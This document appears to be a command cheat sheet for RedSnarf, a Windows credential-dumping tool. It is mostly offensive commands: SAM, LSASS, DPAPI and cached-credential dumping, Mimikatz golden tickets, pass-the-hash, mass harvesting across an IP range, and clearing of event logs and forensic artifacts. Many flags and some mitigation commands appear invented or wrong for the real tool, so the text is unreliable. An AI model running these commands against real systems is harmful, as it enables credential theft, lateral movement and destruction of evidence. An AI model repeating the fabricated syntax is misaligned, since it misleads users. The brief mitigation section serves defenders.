RedSnarf
Overview
Sección titulada «Overview»RedSnarf is a specialized red team tool for extracting credentials and sensitive information from Windows systems. It provides methods to dump cached credentials, extract from SAM databases, harvest from memory, and extract from various Windows storage locations. Used by authorized security professionals for authorized penetration testing, red team engagements, and security assessments. Requires administrative privileges on target systems.
Installation
Sección titulada «Installation»Prerequisites
Sección titulada «Prerequisites»# Python 3.6+
python3 --version
# Required libraries
sudo apt-get install python3-pip python3-dev
# On Windows: Install Visual C++ build tools
# Download: https://visualstudio.microsoft.com/visual-cpp-build-tools/From GitHub
Sección titulada «From GitHub»git clone https://github.com/nccgroup/redsnarf.git
cd redsnarf
pip3 install -r requirements.txtKali Linux
Sección titulada «Kali Linux»sudo apt-get install redsnarfVerify Installation
Sección titulada «Verify Installation»python3 redsnarf.py --help
redsnarf --version
which redsnarfBasic Syntax
Sección titulada «Basic Syntax»python3 redsnarf.py [options] <target>
redsnarf --help
redsnarf --version
redsnarf -h <target> -u <username> -p <password> -d <domain>Essential Commands
Sección titulada «Essential Commands»| Command | Purpose |
|---|---|
-h <target> | Specify target host |
-u <username> | Username for authentication |
-p <password> | Password for authentication |
-d <domain> | Domain name |
-L | Local system extraction |
-R | Remote system extraction |
--sam | Extract SAM database |
--lsass | Dump LSASS memory |
--registry | Extract from registry |
--mimikatz | Run Mimikatz commands |
--hash | Extract password hashes |
--cached | Dump cached credentials |
-o <output> | Output file |
-v | Verbose output |
Credential Extraction Methods
Sección titulada «Credential Extraction Methods»Local SAM Extraction
Sección titulada «Local SAM Extraction»# Extract local SAM database (requires SYSTEM privileges)
python3 redsnarf.py -L --sam --output local_hashes.txtLSASS Memory Dump
Sección titulada «LSASS Memory Dump»# Dump LSASS process memory for credential extraction
python3 redsnarf.py -L --lsass --output lsass_dump.txtCached Credentials
Sección titulada «Cached Credentials»# Extract cached domain credentials from registry
python3 redsnarf.py -L --cached --output cached_creds.txtRemote SAM Extraction
Sección titulada «Remote SAM Extraction»# Extract SAM from remote host
python3 redsnarf.py \
-h 192.168.1.100 \
-u Administrator \
-p MyPassword123 \
-d DOMAIN \
--sam --output remote_hashes.txtMultiple Credential Sources
Sección titulada «Multiple Credential Sources»# Extract from all available sources
python3 redsnarf.py \
-L \
--sam \
--lsass \
--cached \
--registry \
--output all_creds.txtRegistry Extraction
Sección titulada «Registry Extraction»Extract Credentials from Registry
Sección titulada «Extract Credentials from Registry»# Access Windows registry for stored credentials
python3 redsnarf.py \
-L \
--registry \
--hive SAM \
--output registry_creds.txtRemote Registry Access
Sección titulada «Remote Registry Access»# Extract from remote registry via RDP/SMB
python3 redsnarf.py \
-h 192.168.1.100 \
-u Admin \
-p Pass123 \
-d DOMAIN \
--registry \
--remoteAutoLogon Credentials
Sección titulada «AutoLogon Credentials»# Extract stored AutoLogon credentials
python3 redsnarf.py \
-L \
--registry \
--key "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" \
--output autologon.txtVPN Credentials
Sección titulada «VPN Credentials»# Extract stored VPN credentials from registry
python3 redsnarf.py -L --registry --vpn --output vpn_creds.txtHash Extraction
Sección titulada «Hash Extraction»Extract Password Hashes
Sección titulada «Extract Password Hashes»# Dump all password hashes from SAM
python3 redsnarf.py -L --hash --output hashes.txtNTLM Hash Format
Sección titulada «NTLM Hash Format»# Extract NTLM hashes for cracking
python3 redsnarf.py \
-L \
--hash \
--format ntlm \
--output ntlm_hashes.txtLM Hash Extraction
Sección titulada «LM Hash Extraction»# Extract legacy LM hashes (if available)
python3 redsnarf.py -L --hash --format lm --output lm_hashes.txtHash Analysis
Sección titulada «Hash Analysis»# Extract and analyze hashes
python3 redsnarf.py \
-L \
--hash \
--analyze \
--output hash_analysis.txtMimikatz Integration
Sección titulada «Mimikatz Integration»Run Mimikatz Commands
Sección titulada «Run Mimikatz Commands»# Execute Mimikatz commands through redsnarf
python3 redsnarf.py \
-h 192.168.1.100 \
-u Admin \
-p Pass123 \
--mimikatz \
--command "sekurlsa::logonpasswords" \
--output mimikatz_output.txtCredential Dumping via Mimikatz
Sección titulada «Credential Dumping via Mimikatz»# Dump all credentials using Mimikatz
python3 redsnarf.py \
-L \
--mimikatz \
--full \
--output credentials_full.txtGolden Ticket Generation
Sección titulada «Golden Ticket Generation»# Use Mimikatz to create golden ticket
python3 redsnarf.py \
--mimikatz \
--command "kerberos::golden /user:Administrator /domain:DOMAIN.COM /sid:S-1-5-21-..." \
--output golden_ticket.txtRemote Exploitation
Sección titulada «Remote Exploitation»Remote Credential Extraction
Sección titulada «Remote Credential Extraction»# Extract credentials from remote Windows system
python3 redsnarf.py \
-h 192.168.1.100 \
-u domain\administrator \
-p MyPassword123 \
--remote \
--lsass \
--output remote_creds.txtSMB-Based Extraction
Sección titulada «SMB-Based Extraction»# Use SMB protocol for credential extraction
python3 redsnarf.py \
-h 192.168.1.100 \
-u Admin \
-p Pass123 \
-d DOMAIN \
--smb \
--remote \
--samWMI-Based Extraction
Sección titulada «WMI-Based Extraction»# Extract via WMI (Windows Management Instrumentation)
python3 redsnarf.py \
-h 192.168.1.100 \
-u Admin \
-p Pass123 \
-d DOMAIN \
--wmi \
--command "Get-Process lsass"RDP Session Access
Sección titulada «RDP Session Access»# Extract credentials from RDP sessions
python3 redsnarf.py \
-h 192.168.1.100 \
-u Admin \
-p Pass123 \
--rdp \
--extract-sessions \
--output rdp_sessions.txtPrivilege Escalation Chains
Sección titulada «Privilege Escalation Chains»Check Privileges
Sección titulada «Check Privileges»# Check current privilege level
python3 redsnarf.py -L --check-privsToken Impersonation
Sección titulada «Token Impersonation»# Leverage token impersonation for escalation
python3 redsnarf.py \
-L \
--impersonate \
--target SYSTEM \
--output impersonation_result.txtService Account Extraction
Sección titulada «Service Account Extraction»# Extract service account credentials
python3 redsnarf.py \
-h 192.168.1.100 \
-u Admin \
-p Pass123 \
--service-accounts \
--output service_creds.txtGroup Policy Preferences
Sección titulada «Group Policy Preferences»# Extract from Group Policy Preferences (GPP)
python3 redsnarf.py \
-L \
--gpp \
--output gpp_creds.txtBatch Operations
Sección titulada «Batch Operations»Target Multiple Hosts
Sección titulada «Target Multiple Hosts»# Create target list
cat targets.txt
# 192.168.1.100 Administrator Pass123 DOMAIN
# 192.168.1.101 Admin Pass456 DOMAIN
# 192.168.1.102 User789 Pass789 DOMAIN
# Process all targets
while read host user pass domain; do
python3 redsnarf.py -h "$host" -u "$user" -p "$pass" -d "$domain" \
--sam --output "${host}_hashes.txt"
done < targets.txtAutomated Network Harvesting
Sección titulada «Automated Network Harvesting»#!/bin/bash
# Harvest credentials from network
for ip in 192.168.1.{50..100}; do
timeout 5 bash -c "python3 redsnarf.py -h $ip -u Administrator -p password --sam" &
done
waitCredential Aggregation
Sección titulada «Credential Aggregation»#!/bin/bash
# Combine all extracted credentials
cat *.txt | grep -E "admin|root|pass" > all_creds_combined.txt
sort all_creds_combined.txt | uniq > unique_creds.txtOutput Analysis
Sección titulada «Output Analysis»Parse Extracted Credentials
Sección titulada «Parse Extracted Credentials»# Extract usernames and hashes
python3 redsnarf.py -L --sam --output hashes.txt
cat hashes.txt | grep -oE "^[^:]+:[^:]+:[A-F0-9]{32}:[A-F0-9]{32}$"Hash Format Conversion
Sección titulada «Hash Format Conversion»# Convert hashes for use with Hashcat
python3 redsnarf.py -L --hash --output hashes.txt
cat hashes.txt | awk -F: '{print $4}' > hashcat_ntlm.txtCredential Deduplication
Sección titulada «Credential Deduplication»# Remove duplicate credentials
sort -u all_credentials.txt > unique_credentials.txtPlaintext Credential Search
Sección titulada «Plaintext Credential Search»# Search for plaintext credentials
grep -iE "password|pass|pwd|creds" extracted_output.txtAdvanced Extraction
Sección titulada «Advanced Extraction»Memory Parsing
Sección titulada «Memory Parsing»# Dump and parse process memory
python3 redsnarf.py \
-L \
--memory-dump \
--process lsass \
--output lsass_memory.bin
# Parse the dump
python3 redsnarf.py --parse-dump lsass_memory.bin --output parsed.txtKerberos Ticket Extraction
Sección titulada «Kerberos Ticket Extraction»# Extract Kerberos tickets from memory
python3 redsnarf.py \
-L \
--kerberos \
--extract-tickets \
--output tickets.txtDPAPI Data Recovery
Sección titulada «DPAPI Data Recovery»# Extract DPAPI-encrypted credentials
python3 redsnarf.py \
-L \
--dpapi \
--decrypt \
--output dpapi_decrypted.txtCredential Manager Extraction
Sección titulada «Credential Manager Extraction»# Extract Windows Credential Manager credentials
python3 redsnarf.py \
-L \
--credential-manager \
--output credential_manager.txtPost-Exploitation
Sección titulada «Post-Exploitation»Lateral Movement Preparation
Sección titulada «Lateral Movement Preparation»# Extract credentials for lateral movement
python3 redsnarf.py \
-h 192.168.1.100 \
-u Admin \
-p Pass123 \
--extract-all \
--lateral-movement-prep \
--output lateral_creds.txtPersistence Mechanism Setup
Sección titulada «Persistence Mechanism Setup»# Extract data for establishing persistence
python3 redsnarf.py \
-L \
--persistence \
--auto-logon \
--scheduled-task \
--output persistence_creds.txtDomain Enumeration
Sección titulada «Domain Enumeration»# Extract domain information
python3 redsnarf.py \
-h 192.168.1.100 \
-u Admin \
-p Pass123 \
-d DOMAIN \
--domain-enum \
--output domain_info.txtOperational Security
Sección titulada «Operational Security»Evasion Techniques
Sección titulada «Evasion Techniques»# Minimize detection risk
python3 redsnarf.py \
-L \
--quiet \
--no-logging \
--minimal-output \
--output creds.txtLog Cleanup
Sección titulada «Log Cleanup»# Clear event logs post-extraction
python3 redsnarf.py \
-L \
--cleanup \
--clear-logs \
--log-type Security,SystemAnti-Forensics
Sección titulada «Anti-Forensics»# Minimize forensic artifacts
python3 redsnarf.py \
-L \
--anti-forensics \
--clear-timestamps \
--remove-artifactsTroubleshooting
Sección titulada «Troubleshooting»Access Denied
Sección titulada «Access Denied»# Requires SYSTEM privileges
sudo python3 redsnarf.py -L --sam
# Or use credentials with sufficient privileges
python3 redsnarf.py \
-h 192.168.1.100 \
-u DOMAIN\Administrator \
-p MyPassword123 \
--samRemote Connection Issues
Sección titulada «Remote Connection Issues»# Verify network connectivity
ping 192.168.1.100
# Test SMB access
smbclient -L 192.168.1.100 -U Administrator%Password
# Check firewall
netstat -an | grep ESTABLISHEDMimikatz Integration Failed
Sección titulada «Mimikatz Integration Failed»# Verify Mimikatz availability
which mimikatz
# Check Python dependencies
pip3 list | grep -i mimic
# Reinstall requirements
pip3 install -r requirements.txt --upgradeCredential Storage
Sección titulada «Credential Storage»Secure Output
Sección titulada «Secure Output»# Encrypt output file
python3 redsnarf.py -L --sam --output creds.txt
gpg --symmetric --armor creds.txtCredential Database
Sección titulada «Credential Database»# Store in structured format
python3 redsnarf.py \
-L \
--sam \
--database credentials.db \
--format sqliteReal-World Scenarios
Sección titulada «Real-World Scenarios»Internal Network Assessment
Sección titulada «Internal Network Assessment»# Phase 1: Local system extraction
python3 redsnarf.py -L --extract-all --output local_system.txt
# Phase 2: Remote extraction
for host in $(cat internal_hosts.txt); do
python3 redsnarf.py -h "$host" -u Admin -p Pass123 \
--remote --lsass --output "${host}.txt"
done
# Phase 3: Credential aggregation
cat *.txt | grep -oE '[A-F0-9]{32}:[A-F0-9]{32}' > all_hashes.txtDomain Compromise
Sección titulada «Domain Compromise»# Extract domain credentials
python3 redsnarf.py \
-h domain-controller \
-u Administrator \
-p DomainPassword \
-d DOMAIN \
--sam --lsass --cached \
--output domain_dump.txtPrivilege Escalation Chain
Sección titulada «Privilege Escalation Chain»# Extract local admin
python3 redsnarf.py -L --hash --output local_hashes.txt
# Use hash to access remote system
python3 redsnarf.py \
-h 192.168.1.101 \
-u Administrator \
-p <NTLM_HASH> \
--pass-the-hash \
--extract-allBest Practices
Sección titulada «Best Practices»- Obtain Authorization - Only use on authorized systems with written permission
- Enable Logging - Log all operations for documentation and legal requirements
- Minimize Exposure - Extract credentials quickly and securely
- Secure Credentials - Encrypt and protect extracted credential data
- Documentation - Document all systems accessed and credentials extracted
- Clean Up - Remove tools and clear logs after authorized assessment
- Chain Custody - Maintain evidence chain for legal proceedings
- Incident Response - Have remediation plan for extracted credentials
Mitigation
Sección titulada «Mitigation»Prevent SAM Extraction
Sección titulada «Prevent SAM Extraction»# Enable additional access controls
net user Administrator /active:no
# Require strong passwords
net accounts /minpwlen:14 /complexity:onLSASS Protection
Sección titulada «LSASS Protection»# Enable LSASS protection (Windows 10+)
Set-ProcessMitigation -PolicyName "lsass.exe" -Enable ParentImageLoadAuditCredential Guard
Sección titulada «Credential Guard»# Enable Windows Defender Credential Guard
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" `
-Name "LsaCfgFlags" -Value 1 -PropertyType DWORDAdditional Resources
Sección titulada «Additional Resources»- RedSnarf GitHub: https://github.com/nccgroup/redsnarf
- Windows Credentials: https://docs.microsoft.com/en-us/windows/security/
- Hash Cracking: https://hashcat.net/
- Credential Dumping: https://attack.mitre.org/techniques/T1003/